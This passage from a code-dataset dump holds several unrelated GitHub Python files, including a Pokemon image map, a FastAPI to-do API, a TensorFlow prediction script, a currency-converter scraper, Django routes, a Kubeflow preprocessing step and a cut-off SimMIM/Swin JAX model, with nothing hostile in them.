\"253.png\",\n \"Sceptile\" : \"254.png\",\n \"Torchic\" : \"255.png\",\n \"Combusken\" : \"256.png\",\n \"Blaziken\" : \"257.png\",\n \"Mudkip\" : \"258.png\",\n \"Marshtomp\" : \"259.png\",\n \"Swampert\" : \"260.png\",\n \"Poochyena\" : \"261.png\",\n \"Mightyena\" : \"262.png\",\n \"Zigzagoon\" : \"263.png\",\n \"Linoone\" : \"264.png\",\n \"Wurmple\" : \"265.png\",\n \"Silcoon\" : \"266.png\",\n \"Beautifly\" : \"267.png\",\n \"Cascoon\" : \"268.png\",\n \"Dustox\" : \"269.png\",\n \"Lotad\" : \"270.png\",\n \"Lombre\" : \"271.png\",\n \"Ludicolo\" : \"272.png\",\n \"Seedot\" : \"273.png\",\n \"Nuzleaf\" : \"274.png\",\n \"Shiftry\" : \"275.png\",\n \"Taillow\" : \"276.png\",\n \"Swellow\" : \"277.png\",\n \"Wingull\" : \"278.png\",\n \"Pelipper\" : \"279.png\",\n \"Ralts\" : \"280.png\",\n \"Kirlia\" : \"281.png\",\n \"Gardevoir\" : \"282.png\",\n \"Surskit\" : \"283.png\",\n \"Masquerain\" : \"284.png\",\n \"Shroomish\" : \"285.png\",\n \"Breloom\" : \"286.png\",\n \"Slakoth\" : \"287.png\",\n \"Vigoroth\" : \"288.png\",\n \"Slaking\" : \"289.png\",\n \"Nincada\" : \"290.png\",\n \"Ninjask\" : \"291.png\",\n \"Shedinja\" : \"292.png\",\n \"Whismur\" : \"293.png\",\n \"Loudred\" : \"294.png\",\n \"Exploud\" : \"295.png\",\n \"Makuhita\" : \"296.png\",\n \"Hariyama\" : \"297.png\",\n \"Azurill\" : \"298.png\",\n \"Nosepass\" : \"299.png\",\n \"Skitty\" : \"300.png\",\n \"Delcatty\" : \"301.png\",\n \"Sableye\" : \"302.png\",\n \"Mawile\" : \"303.png\",\n \"Aron\" : \"304.png\",\n \"Lairon\" : \"305.png\",\n \"Aggron\" : \"306.png\",\n \"Meditite\" : \"307.png\",\n \"Medicham\" : \"308.png\",\n \"Electrike\" : \"309.png\",\n \"Manectric\" : \"310.png\",\n \"Plusle\" : \"311.png\",\n \"Minum\" : \"312.png\",\n \"Volbeat\" : \"313.png\",\n \"Illumise\" : \"314.png\",\n \"Roselia\" : \"315.png\",\n \"Gulpin\" : \"316.png\",\n \"Swalot\" : \"317.png\",\n \"Carvanha\" : \"318.png\",\n \"Sharpedo\" : \"319.png\",\n \"Wailmer\" : \"320.png\",\n \"Wailord\" : \"321.png\",\n \"Numel\" : \"322.png\",\n \"Camerupt\" : \"323.png\",\n \"Torkoal\" : \"324.png\",\n \"Spoink\" : \"325.png\",\n \"Grumpig\" : \"326.png\",\n \"Spinda\" : \"327.png\",\n \"Trapinch\" : \"328.png\",\n \"Vibrava\" : \"329.png\",\n \"Flygon\" : \"330.png\",\n \"Cacnea\" : \"331.png\",\n \"Cacturne\" : \"332.png\",\n \"Swablu\" : \"333.png\",\n \"Altaria\" : \"334.png\",\n \"Zangoose\" : \"335.png\",\n \"Seviper\" : \"336.png\",\n \"Lunatone\" : \"337.png\",\n \"Solrock\" : \"338.png\",\n \"Barboach\" : \"339.png\",\n \"Wiscash\" : \"340.png\",\n \"Corphish\" : \"341.png\",\n \"Crawdaunt\" : \"342.png\",\n \"Baltoy\" : \"343.png\",\n \"Claydol\" : \"344.png\",\n \"Lileep\" : \"345.png\",\n \"Cradily\" : \"346.png\",\n \"Anorith\" : \"347.png\",\n \"Armaldo\" : \"348.png\",\n \"Feebas\" : \"349.png\",\n \"Milotic\" : \"350.png\",\n \"Castform\" : \"351.png\",\n \"Kecleon\" : \"352.png\",\n \"Shuppet\" : \"353.png\",\n \"Banette\" : \"354.png\",\n \"Duskull\" : \"355.png\",\n \"Dusclops\" : \"356.png\",\n \"Tropius\" : \"357.png\",\n \"Chimecho\" : \"358.png\",\n \"Absol\" : \"359.png\",\n \"Wynaut\" : \"360.png\",\n \"Snorunt\" : \"361.png\",\n \"Glalie\" : \"362.png\",\n \"Spheal\" : \"363.png\",\n \"Sealeo\" : \"364.png\",\n \"Walrein\" : \"365.png\",\n \"Clamperl\" : \"366.png\",\n \"Huntail\" : \"367.png\",\n \"Gorebyss\" : \"368.png\",\n \"Relicanth\" : \"369.png\",\n \"Luvdisc\" : \"370.png\",\n \"Bagon\" : \"371.png\",\n \"Shelgon\" : \"372.png\",\n \"Salamence\" : \"373.png\",\n \"Beldum\" : \"374.png\",\n \"Metang\" : \"375.png\",\n \"Metagross\" : \"376.png\",\n \"Regirock\" : \"377.png\",\n \"Regice\" : \"378.png\",\n \"Registeel\" : \"379.png\",\n \"Latias\" : \"380.png\",\n \"Latios\" : \"381.png\",\n \"Kyogre\" : \"382.png\",\n \"Groudon\" : \"383.png\",\n \"Rayquaza\" : \"384.png\",\n \"Jirachi\" : \"385.png\",\n \"Deoxys\" : \"386.png\",\n \"Turtwig\" : \"387.png\",\n \"Grotle\" : \"388.png\" ,\n \"Torterra\" : \"389.png\" , \n \"Chimchar\" : \"390.png\" , \n \"Monferno\" : \"391.png\" , \n \"Infernape\" : \"392.png\" ,\n \"Piplup\" : \"393.png\" , \n \"Prinplup\" : \"394.png\" , \n \"Empoleon\" : \"395.png\" , \n \"Starly\" : \"396.png\" ,\n \"Staravia\" : \"397.png\" ,\n \"Staraptor\" : \"398.png\" ,\n \"Bidoof\" : \"399.png\" ,\n \"Babarel\" : \"400.png\" ,\n \"Kricketot\" : \"401.png\" ,\n \"Kricketune\" : \"402.png\" ,\n \"Shinx\" : \"403.png\" ,\n \"Luxio\" : \"404.png\" ,\n \"Luxray\" : \"405.png\" ,\n \"Budew\" : \"406.png\" ,\n \"Roserade\" : \"407.png\" ,\n \"Cranidos\" : \"408.png\" ,\n \"Rampardos\" : \"409.png\" ,\n \"Shieldon\" : \"410.png\" ,\n \"Bastiodon\" : \"411.png\" ,\n \"Burmy\" : \"412.png\" ,\n \"Wormadam\" : \"413.png\" ,\n \"Mothim\" : \"414.png\" ,\n \"Combee\" : \"415.png\" ,\n \"Vespiquen\" : \"416.png\" ,\n \"Pachirisu\" : \"417.png\" ,\n \"Buizel\" : \"418.png\" ,\n \"Floatzel\" : \"419.png\" ,\n \"Cherubi\" : \"420.png\" ,\n \"Cherrim\" : \"421.png\" ,\n \"Shellos\" : \"422.png\" ,\n \"Gastrodon\" : \"423.png\" ,\n \"Ambipom\" : \"424.png\" ,\n \"Drifloon\" : \"425.png\" ,\n \"Drifblim\" : \"426.png\" ,\n \"Buneary\" : \"427.png\" ,\n \"Lopunny\" : \"428.png\" ,\n \"Mismagius\" : \"429.png\" ,\n \"Honchkrow\" : \"430.png\" ,\n \"Glameow\" : \"431.png\" ,\n \"Purugly\" : \"432.png\" ,\n \"Chingling\" : \"433.png\" ,\n \"Stunky\" : \"434.png\" ,\n \"Stunktank\" : \"435.png\" ,\n \"Bronzor\" : \"436.png\" ,\n \"Bronzong\" : \"437.png\" ,\n \"Bonsly\" : \"438.png\" ,\n \"Mime Jr.\" : \"388.png\" ,\n \"Happiny\" : \"389.png\" , \n \"Chatot\" : \"390.png\" , \n \"Spiritomb\" : \"391.png\" ,\n \"Gible\" : \"392.png\" , \n \"Gibite\" : \"393.png\" , \n \"Garchomp\" : \"394.png\" , \n \"Munchlax\" : \"395.png\" ,\n \"Riolu\" : \"396.png\" ,\n \"Lucario\" : \"397.png\" ,\n \"Hippopotas\" : \"398.png\" ,\n \"Hippowdon\" : \"399.png\" ,\n \"Skorupi\" : \"400.png\" ,\n \"Drapion\" : \"401.png\" ,\n \"Croagunk\" : \"402.png\" ,\n \"Toxicroak\" : \"403.png\" ,\n \"Carnivine\" : \"404.png\" ,\n \"Finneon\" : \"405.png\" ,\n \"Lumineon\" : \"406.png\" ,\n \"Mantyke\" : \"407.png\" ,\n \"Snover\" : \"408.png\" ,\n \"Abomasnow\" : \"409.png\" ,\n \"Weavile\" : \"410.png\" ,\n \"Magnezone\" : \"411.png\" ,\n \"Lickilicky\" : \"412.png\" ,\n \"Rhyperior\" : \"413.png\" ,\n \"Tangrowth\" : \"414.png\" ,\n \"Electivire\" : \"415.png\" ,\n \"Magmortar\" : \"416.png\" ,\n \"Togekiss\" : \"417.png\" ,\n \"Yanmega\" : \"418.png\" ,\n \"Leafeon\" : \"419.png\" ,\n \"Glaceon\" : \"420.png\" ,\n \"Gliscor\" : \"421.png\" ,\n \"Mamoswine\" : \"422.png\" ,\n \"Porygon-z\" : \"423.png\" ,\n \"Gallade\" : \"424.png\" ,\n \"Probopass\" : \"425.png\" ,\n \"Dusknoir\" : \"426.png\" ,\n \"Frosslass\" : \"427.png\" ,\n \"Rotom\" : \"428.png\" ,\n \"Uxie\" : \"429.png\" ,\n \"Mesprit\" : \"430.png\" ,\n \"Azelf\" : \"431.png\" ,\n \"Dialga\" : \"432.png\" ,\n \"Palkia\" : \"433.png\" ,\n \"Heatran\" : \"434.png\" ,\n \"Regigigas\" : \"435.png\" ,\n \"Giratina\" : \"436.png\" ,\n \"Cresselia\" : \"437.png\" ,\n \"Phione\" : \"438.png\" ,\n \"Manaphy\" : \"439.png\" ,\n \"Darkrai\" : \"440.png\" ,\n \"Shaymin\" : \"441.png\" ,\n \"Arceus\" : \"442.png\" ,\n}","repo_name":"KevinLu19/PokemonGame","sub_path":"Pokemon/names.py","file_name":"names.py","file_ext":"py","file_size_in_byte":13851,"program_lang":"python","lang":"hr","doc_type":"code","stars":1,"dataset":"github-code","pt":"36"}
+{"seq_id":"3680875758","text":"from typing import List\nfrom unicodedata import name\nfrom uuid import uuid4\n\nfrom fastapi import Depends, FastAPI, HTTPException, status\nfrom sqlalchemy.orm import Session\n\nfrom database import engine, get_session\nfrom models import Base, TodoList, ListItem\nfrom schemas import ListItemRequest, ListItemResponse, ListRequest, ListResponse\n\nBase.metadata.create_all(engine)\napp = FastAPI()\n\n\n@app.get(\"/\")\ndef read_root():\n \"\"\"\n API information.\n \"\"\"\n return {\"message\": \"Mudapp to-do list, for all your shit.\"}\n\n\n@app.get(\"/list\", response_model=List[ListResponse])\ndef get_all_lists(session: Session = Depends(get_session)):\n \"\"\"\n Return a list of all to-do lists stored by the app.\n \"\"\"\n response = []\n lists = session.query(TodoList).all()\n for list in lists:\n items = session.query(ListItem).filter_by(id=list.id).all()\n list_response = ListResponse(\n id=list.id,\n name=list.name,\n items=[\n ListItemResponse(\n id=item.id,\n name=item.name,\n completed=item.completed,\n due_date=item.due_date if item.due_date else None,\n )\n for item in items\n ],\n )\n response.append(list_response)\n\n return response\n\n\n@app.post(\"/list\", response_model=ListResponse, status_code=status.HTTP_201_CREATED)\ndef create_list(request: ListRequest, session: Session = Depends(get_session)):\n \"\"\"\n Create a to-do list using the request content.\n \"\"\"\n # create list\n todo_list = TodoList(name=request.name)\n session.add(todo_list)\n session.commit()\n\n # create list items\n list_items = []\n if request.items:\n list_items = [\n ListItem(\n name=item.name,\n completed=False,\n due_date=item.due_date,\n id=todo_list.id\n ) for item in request.items\n ]\n session.add_all(list_items)\n session.commit()\n\n return ListResponse(id=todo_list.id, name=request.name, items=list_items)\n\n\n@app.get(\"/list/{id}\", response_model=ListResponse)\ndef get_list(id: int, session: Session = Depends(get_session)):\n \"\"\"\n Return a specific list by ID.\n \"\"\"\n list: TodoList = session.query(TodoList).get(id)\n if list is None:\n raise HTTPException(status_code=404, detail=\"List not found.\")\n\n return ListResponse(id=list.id, name=list.name, items=list.items)\n\n\n@app.put(\"/list/{id}\", response_model=ListResponse)\ndef rename_list(\n id: int, request: ListRequest, session: Session = Depends(get_session)\n):\n \"\"\"\n Rename an existing to-do list.\n \"\"\"\n list: TodoList = session.query(TodoList).get(id)\n if list is None:\n raise HTTPException(status_code=404, detail=\"List not found.\")\n list.name = request.name\n session.commit()\n\n return ListResponse(id=list.id, name=list.name, items=list.items)\n\n\n@app.delete(\"/list/{id}\")\ndef delete_list(id: int, session: Session = Depends(get_session)):\n \"\"\"\n Delete an existing to-do list.\n \"\"\"\n list: TodoList = session.query(TodoList).get(id)\n if list is None:\n raise HTTPException(status_code=404, detail=\"List not found.\")\n session.delete(list)\n session.commit()\n\n return {\"message\": \"List deleted.\"}\n","repo_name":"manudawber/mudapp","sub_path":"mudapp/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3338,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
+{"seq_id":"11652327676","text":"import tensorflow as tf\nimport tensorflow_hub as hub\nfrom PIL import Image\nimport numpy as np\nimport argparse\nimport json\n\n\n\n\nimage_path=\"./test_images/\"\n\n\n\n##Load the model\nsaved_model=\"my_model.h5\"\nmodel=tf.keras.models.load_model(saved_model,custom_objects={'KerasLayer':hub.KerasLayer})\nmodel.summary()\n\n\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"-i\",\"--image\", help=\"./test_images/\", required=False, default=1)\nparser.add_argument(\"-m\",\"--model\", help=\"my_model.h5\", required=False,default=2)\nparser.add_argument(\"-k\",\"--top_k\", help=\"top k probs of the image\",required=False, default=3)\nparser.add_argument(\"-c\",\"--category_names\",help=\"classes\",required=False,default=4)\n\nargs = vars(parser.parse_args())\n\nimage_path = args['image']\nsaved_model = args['model']\ntop_k = args['top_k']\ncategory_names = args['category_names']\nimage_size = 224\n\n\n\n# Create the process_image function\ndef process_image(numpy_image):\n print(numpy_image.shape)\n tensor_img=tf.image.convert_image_dtype(numpy_image, dtype=tf.int16, saturate=False)\n resized_img=tf.image.resize(numpy_image,(image_size,image_size)).numpy()\n normal_img=resized_img/255\n\n return normal_img \n\n# Create the predict function\ndef predict(image_path, model, top_k=3):\n #if top_k < 1:\n # top_k = 1\n image = Image.open(image_path)\n image = np.asarray(image)\n image = process_image(image)\n expanded_image = np.expand_dims(image, axis=0)\n probes = model.predict(expanded_image)\n top_k_values, top_k_indices = tf.nn.top_k(probes, k=top_k)\n \n top_k_values = top_k_values.numpy()\n top_k_indices = top_k_indices.numpy()\n \n \n\n return top_k_values, top_k_indices, image\n\n\nif category_names != None:\n with open(category_names, 'r') as f:\n class_names = json.load(f)\n print(\"Classes Values:\")\n top_k_values, top_k_indices = predict(image_path, model, topk=int(top_k))\n # top_k_values, top_k_indices = predict(image_path, model, top_k)\n for idx in top_k_indices[0]:\n print(\"-\",class_names[str(idx+1)])\n\n\nprint('Probabilties:', top_k_values)\nprint('Classes Keys:', top_k_indices) \n \n \n","repo_name":"aldovazquez90/Image_classifier_project_udacity","sub_path":"predict1.py","file_name":"predict1.py","file_ext":"py","file_size_in_byte":2142,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
+{"seq_id":"10840948288","text":"import os\nimport requests\nfrom bs4 import BeautifulSoup\nfrom babel.numbers import format_currency\n\nos.system(\"cls\")\n\n\"\"\"\nUse the 'format_currency' function to format the output of the conversion\nformat_currency(AMOUNT, CURRENCY_CODE, locale=\"ko_KR\" (no need to change this one))\n\"\"\"\n\ndef transferwise_crawl(transferurl):\n url = transferurl\n result = requests.get(url)\n soup = BeautifulSoup(result.text, \"html.parser\")\n \n div1 = soup.find(\"span\",{\"class\":\"text-success\"}).string\n \n\n rate = float(div1)\n # print(converted)\n return rate\n\n\ndef crawl():\n url = \"https://www.iban.com/currency-codes\"\n \n iban_result = requests.get(url)\n iban_soup = BeautifulSoup(iban_result.text, \"html.parser\")\n\n table = iban_soup.find(\"table\", {\"class\": \"table table-bordered downloads tablesorter\"})\n\n tbody = table.find(\"tbody\")\n tds = tbody.find_all(\"td\")\n\n information = {}\n length = len(tds)\n key = 0\n country = []\n for i in range(0, length, 4):\n if tds[i + 1].string == \"No universal currency\":\n continue\n else:\n country.append(tds[i].string.capitalize())\n country.append(tds[i + 1].string.capitalize())\n country.append(tds[i + 2].string)\n country.append(tds[i + 3].string)\n information[key] = country\n key = key + 1\n country = []\n\n return information\n\ndef caculator(money, value):\n return money * value\n \ndef main():\n country_dic = crawl()\n print(\"Welcome to CurrencyConvert PRO 2000: \\n\")\n\n for i in range(len(country_dic)):\n print('# {} {}'.format(i, country_dic[i][0]))\n\n print(\"Where are you from? Choose a country by number.\\n\")\n from_num = int(input(\"#: \"))\n print(f\"{country_dic[from_num][0]}\\n\")\n\n print(\"Now choose another country.\\n\")\n another_country_num = int(input(\"#: \"))\n print(f\"{country_dic[another_country_num][0]}\\n\")\n\n while (True):\n try:\n print(f\"How many {country_dic[from_num][2]} do you want to convert to {country_dic[another_country_num][2]}\")\n money = int(input())\n break\n except:\n print(\"That wasn't a number.\\n\")\n continue\n\n\n transfer_url = \"https://transferwise.com/gb/currency-converter/\"+ str(country_dic[from_num][2].lower())+\"-to-\"+str(country_dic[another_country_num][2].lower())+\"-rate\"+\"?amount=\"+str(money)+\"#rate-alerts\"\n value = transferwise_crawl(transfer_url)\n result = caculator(money, value)\n\n print(format_currency(money,country_dic[from_num][2],locale=\"ko_KR\")+\" is \",end='')\n print(format_currency(result,country_dic[another_country_num][2],locale=\"ko_KR\"))\n\nmain()","repo_name":"cheonjiwan/python_challenge","sub_path":"assignment/Day6.py","file_name":"Day6.py","file_ext":"py","file_size_in_byte":2692,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
+{"seq_id":"34366372883","text":"from scripts.hackerrank.fizzBuzz import fizzBuzz\n\nclass Test:\n test_cases = [\n [15, [1, 2, \"Fizz\", 4, \"Buzz\", \"Fizz\", 7, 8, \"Fizz\", \"Buzz\", 11, \"Fizz\", 13, 14, \"FizzBuzz\"]]\n ]\n testable_functions = [fizzBuzz]\n\n def test_fizz_buzz(self):\n for f in self.testable_functions:\n for case, expected in self.test_cases:\n assert f(case) == expected\n\n ","repo_name":"TrellixVulnTeam/learning_to_test_code_BL81","sub_path":"tests/hackerrank/test_fizzBuzz.py","file_name":"test_fizzBuzz.py","file_ext":"py","file_size_in_byte":397,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
+{"seq_id":"12232321199","text":"import random\n\n#create a list of all movies for the game\nlistofmovies=['avengers endgame','star wars the force awakens','avengers infinity war','jurassic world','the lion king','furious seven','black panther','harry potter',\n'frozen','beauty and the beast','incredibles two','iron man three','minions','aquaman','aladdin','finding dory','zootopia','spectre','spider man homecoming','batman v superman','hunger games'\n]\n#list of all vowels to remove everything except them from the name of the movie \nvowels=['a','e','i','o','u']\n#list of alphabets of 'hollywood' to cut them one by one everytime the user makes a wrong guess\nstring=['h','o','l','l','y','w','o','o','d']\n\n#choosing random movie from list of movies\nchoosen=random.choice(listofmovies)\n'''okay so quite a bit to explain here...\nfirst we remove the spaces from the name of movie using the split function which splits the string from there is a space\n'''\nremove_spaces=choosen.split(' ')\n\n'''secondly we take the previous variable and put a '/' where there was a space in the name using the join function\nif you feel it is too many functions, don't fret just head over to python docs to read about every function that I have used here'''\n\nchoosen='/'.join(remove_spaces)\n\n#create empty list to get the final string that is formatted to our desire\ntoshow=[]\n\ntempstring=string\nfor x in choosen:\n if x in vowels:\n toshow.append(x)\n elif x=='/': \n toshow.append('/')\n else:\n toshow.append('_')\n","repo_name":"vandanrohatgi/HW-python-project","sub_path":"task1.py","file_name":"task1.py","file_ext":"py","file_size_in_byte":1483,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
+{"seq_id":"35597809308","text":"from django.urls import path\nfrom .views import (\n ItemListView,\n AddToCartView,\n OrderDetailView,\n AddCouponView,\n PaymentView,\n ItemDetailView,\n OrderItemDeleteView,\n OrderQuantityUpdateView,\n AddressListView,\n AddressCreateView,\n AddressUpdateView,\n AddressDeleteView,\n CountryListView,\n RegionListView,\n CityListView,\n UserIDView,\n OrderHistoryView,\n )\n\nurlpatterns = [\n path('products/', ItemListView.as_view(), name='product-list'),\n path('products//', ItemDetailView.as_view(), name='product-detail'),\n path('add-to-cart/', AddToCartView.as_view(), name='add-to-cart'),\n path('order-summary/', OrderDetailView.as_view(), name='order-summary'),\n path('order-items//delete/', OrderItemDeleteView.as_view(), name='order-item-delete'),\n path('order-items/update-quantity/', OrderQuantityUpdateView.as_view(), name='order-item-update-quantity'),\n path('add-coupon/', AddCouponView.as_view(), name='add-coupon'),\n path('addresses/', AddressListView.as_view(), name='address-list'),\n path('checkout/', PaymentView.as_view(), name='checkout'),\n path('order-history/', OrderHistoryView.as_view(), name='order-history'),\n path('user-id/', UserIDView.as_view(), name='user-id'),\n path('addresses/create/', AddressCreateView.as_view(), name='address-create'),\n path('addresses//update/', AddressUpdateView.as_view(), name='address-update'),\n path('addresses//delete/', AddressDeleteView.as_view(), name='address-delete'),\n path('countries/', CountryListView.as_view(), name='countries'),\n path('regions/', RegionListView.as_view(), name='regions'),\n path('cities/', CityListView.as_view(), name='cities'),\n]\n","repo_name":"kyleherring180/DjangoReactEcommerce","sub_path":"backend/src/core/api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1724,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
+{"seq_id":"42466113523","text":"# preprocess data\n\ndef preprocess_data(load_data_path: InputPath(str), \n preprocess_data_path: OutputPath(str)):\n \n # import Library\n import sys, subprocess;\n subprocess.run([\"python\", \"-m\", \"pip\", \"install\", \"--upgrade\", \"pip\"])\n subprocess.run([sys.executable, '-m', 'pip', 'install','pandas'])\n subprocess.run([sys.executable, '-m', 'pip', 'install','scikit-learn'])\n import os, pickle;\n import pandas as pd\n import numpy as np\n from sklearn.model_selection import train_test_split\n\n #loading the train data\n with open(f'{load_data_path}/all_data', 'rb') as f:\n ntrain, all_data = pickle.load(f)\n \n # split features and label\n all_data_X = all_data.drop('label', axis=1)\n all_data_y = all_data.label\n \n # Reshape image in 3 dimensions (height = 28px, width = 28px , channel = 1)\n all_data_X = all_data_X.values.reshape(-1,28,28,1)\n\n # Normalize the data\n all_data_X = all_data_X / 255.0\n \n #Get the new dataset\n X = all_data_X[:ntrain].copy()\n y = all_data_y[:ntrain].copy()\n \n # split into train and test\n X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.1, random_state=42)\n \n #creating the preprocess directory\n os.makedirs(preprocess_data_path, exist_ok = True)\n \n #Save the train_data as a pickle file to be used by the modelling component.\n with open(f'{preprocess_data_path}/train', 'wb') as f:\n pickle.dump((X_train, y_train), f)\n \n #Save the test_data as a pickle file to be used by the predict component.\n with open(f'{preprocess_data_path}/test', 'wb') as f:\n pickle.dump((X_test, y_test), f)\n \n return(print('Done!'))","repo_name":"chasecadet/ezaf","sub_path":"pipelines/v1 /containerized_python_components/digit-recognition-kaggle-competition/components/GPT_files /preprocess_data /preprocess_data.py","file_name":"preprocess_data.py","file_ext":"py","file_size_in_byte":1716,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
+{"seq_id":"13512145256","text":"import dataclasses\nfrom typing import Any, Tuple\n\nimport einops\nimport jax.numpy as jnp\nfrom flax import linen\n\nfrom .HiViT import HierarchicalViT\nfrom .SwinV2 import SwinTransformerV2\nfrom .ViT import VisionTransformer\n\n\nclass WindowedNorm(linen.Module):\n target_size: Tuple[int]\n window_size: int = 47\n\n def get_targets_count(self):\n window_shape = (self.window_size, self.window_size)\n padding = (\n (self.window_size // 2, self.window_size // 2),\n (self.window_size // 2, self.window_size // 2),\n )\n\n targets_count = jnp.ones((1, self.target_size[0], self.target_size[1], 1))\n\n targets_count = linen.avg_pool(\n targets_count,\n window_shape=window_shape,\n strides=(1, 1),\n padding=padding,\n count_include_pad=True,\n )\n targets_count = targets_count * jnp.power(self.window_size, 2.0)\n targets_count = jnp.int32(jnp.rint(targets_count))\n return targets_count\n\n def setup(self):\n self.targets_count = self.variable(\n \"simmim_constants\",\n \"targets_count\",\n self.get_targets_count,\n ).value\n\n def __call__(self, targets):\n window_size = self.window_size\n\n window_shape = (window_size, window_size)\n padding = (\n (window_size // 2, window_size // 2),\n (window_size // 2, window_size // 2),\n )\n\n targets_ = targets\n\n targets_square = jnp.power(targets, 2.0)\n\n targets_mean = linen.avg_pool(\n targets,\n window_shape=window_shape,\n strides=(1, 1),\n padding=padding,\n count_include_pad=False,\n )\n targets_square_mean = linen.avg_pool(\n targets_square,\n window_shape=window_shape,\n strides=(1, 1),\n padding=padding,\n count_include_pad=False,\n )\n\n targets_var = targets_square_mean - jnp.power(targets_mean, 2.0)\n targets_var = targets_var * (self.targets_count / (self.targets_count - 1))\n targets_var = jnp.maximum(targets_var, 0.0)\n\n targets_ = (targets_ - targets_mean) / jnp.sqrt(targets_var + 1.0e-6)\n\n return targets_\n\n\nclass SwinTransformerV2ForSimMIM(SwinTransformerV2):\n def setup(self):\n super().setup()\n\n token_init = linen.initializers.normal(0.02)\n self.mask_token = self.param(\"mask_token\", token_init, (1, 1, self.embed_dim))\n\n def __call__(self, x, mask, train: bool = False):\n x = self.patch_embed(x)\n\n B, L, _ = x.shape\n mask_token = linen.dtypes.promote_dtype(self.mask_token, dtype=self.dtype)[0]\n mask_tokens = jnp.broadcast_to(mask_token, (B, L, self.embed_dim))\n mask = jnp.reshape(mask, (B, L, 1)).astype(mask_tokens.dtype)\n x = x * (1.0 - mask) + mask_tokens * mask\n\n x = self.pos_drop(x, deterministic=not train)\n\n for layer in self.swin_body:\n x = layer(x, train=train)\n\n x = self.norm(x)\n\n B, L, C = x.shape\n H = W = int(L**0.5)\n x = jnp.reshape(x, (B, H, W, C))\n return x\n\n def get_stride(self):\n return self.patch_size * 2 ** (len(self.depths) - 1)\n\n\nclass VisionTransformerForSimMIM(VisionTransformer):\n def setup(self):\n super().setup()\n\n token_init = linen.initializers.normal(0.02)\n self.mask_token = self.param(\"mask_token\", token_init, (1, 1, self.embed_dim))\n\n def __call__(self, x, mask, train: bool = False):\n x = self.patch_embed(x)\n\n B, L, _ = x.shape\n mask_tokens = jnp.broadcast_to(self.mask_token, (B, L, self.embed_dim))\n mask = jnp.reshape(mask, (B, L, 1)).astype(mask_tokens.dtype)\n x = x * (1.0 - mask) + mask_tokens * mask\n\n x = self.pos_emb(x)\n\n for layer in self.vit_body:\n x = layer(x, train=train)\n\n x = self.norm(x)\n\n B, L, C = x.shape\n H = W = int(L**0.5)\n x = jnp.reshape(x, (B, H, W, C))\n return x\n\n def get_stride(self):\n return self.patch_size\n\n\nclass HierarchicalViTForSimMIM(HierarchicalViT):\n def setup(self):\n super().setup()\n\n token_init = linen.initializers.normal(0.02)\n self.mask_token = self.param(\"mask_token\", token_init, (1, 1, self.embed_dim))\n\n def __call__(self, x, mask, train: bool = False):\n x = self.patch_embed(x)\n\n B, L, _ = x.shape\n H = W = int(L**0.5)\n mask_token = linen.dtypes.promote_dtype(self.mask_token, dtype=self.dtype)[0]\n mask_tokens = jnp.broadcast_to(mask_token, (B, L, self.embed_dim))\n mask = jnp.reshape(mask, (B, H, W, 1)).astype(mask_tokens.dtype)\n mask = self.patch_embed.patches_reshape(mask)\n x = x * (1.0 - mask) + mask_tokens * mask\n\n for layer in self.vit_body:\n x = layer(x, train=train)\n\n x = self.norm(x)\n\n B, L, C = x.shape\n H = W = int(L**0.5)\n x = jnp.reshape(x, (B, H, W, C))\n return x\n\n def get_stride(self):\n return 16\n\n\nclass SimMIM(linen.Module):\n encoder: linen.Module = SwinTransformerV2ForSimMIM\n encoder_stride: int = 32\n\n patch_size: int = 4\n\n enable_windowed_norm: bool = False\n norm_patch_size: int = 47\n\n dtype: Any = jnp.float32\n\n @linen.compact\n def __call__(self, x, mask, train: bool = False):\n z = self.encoder(x, mask, train)\n x_rec = linen.Conv(\n features=self.encoder_stride**2 * 3,\n kernel_size=(1, 1),\n dtype=self.dtype,\n )(z)\n x_rec = einops.rearrange(\n x_rec,\n pattern=\"... h w (c b1 b2) -> ... (h b1) (w b2) c\",\n b1=self.encoder_stride,\n b2=self.encoder_stride,\n )\n\n mask = jnp.expand_dims(\n jnp.repeat(\n jnp.repeat(mask, self.patch_size, axis=1),\n self.patch_size,\n axis=2,\n ),\n axis=-1,\n )\n\n B, H, W, C = x.shape\n if self.enable_windowed_norm:\n x = WindowedNorm(target_size=(H, W), window_size=self.norm_patch_size)(x)\n\n x_rec = linen.dtypes.promote_dtype(x_rec, dtype=x.dtype)[0]\n loss_recon = jnp.abs(x - x_rec)\n loss = jnp.sum(loss_recon * mask) / (jnp.sum(mask) + 1e-5) / C\n\n return loss, x_rec\n\n @classmethod\n def build(cls, config, **kwargs):\n encoder = config.encoder.build(config.encoder, **kwargs)\n\n config = dataclasses.asdict(config)\n config = {key: kwargs[key] if key in kwargs else config[key] for key in config}\n config[\"encoder\"] = encoder\n config[\"encoder_stride\"] = encoder.get_stride()\n return cls(**config)\n\n def extend_parser(self, parser):\n parser = self.encoder.extend_parser(parser)\n parser.add_argument(\n \"--enable-windowed-norm\",\n action=\"store_true\",\n help=\"Use windowed norm of input images as reconstruction target in SimMIM\",\n )\n return parser\n\n def should_decay(self, path, _):\n if path[0].key == \"encoder\":\n return self.encoder.should_decay(path[1:], _)\n\n is_kernel = path[-1].key == \"kernel\"\n verdict = is_kernel\n return verdict\n\n\ndef simmim_swinv2_tiny():\n config = {\n \"embed_dim\": 96,\n \"depths\": (2, 2, 6, 2),\n \"num_heads\": (3, 6, 12, 24),\n }\n encoder = SwinTransformerV2ForSimMIM(**config)\n\n config = {\n \"encoder\": encoder,\n \"encoder_stride\": encoder.get_stride(),\n \"patch_size\": encoder.patch_size,\n }\n return SimMIM(**config)\n\n\ndef simmim_swinv2_base():\n config = {\n \"embed_dim\": 128,\n \"depths\": (2, 2, 18, 2),\n \"num_heads\": (4, 8, 16, 32),\n }\n encoder = SwinTransformerV2ForSimMIM(**config)\n\n config = {\n \"encoder\": encoder,\n \"encoder_stride\": 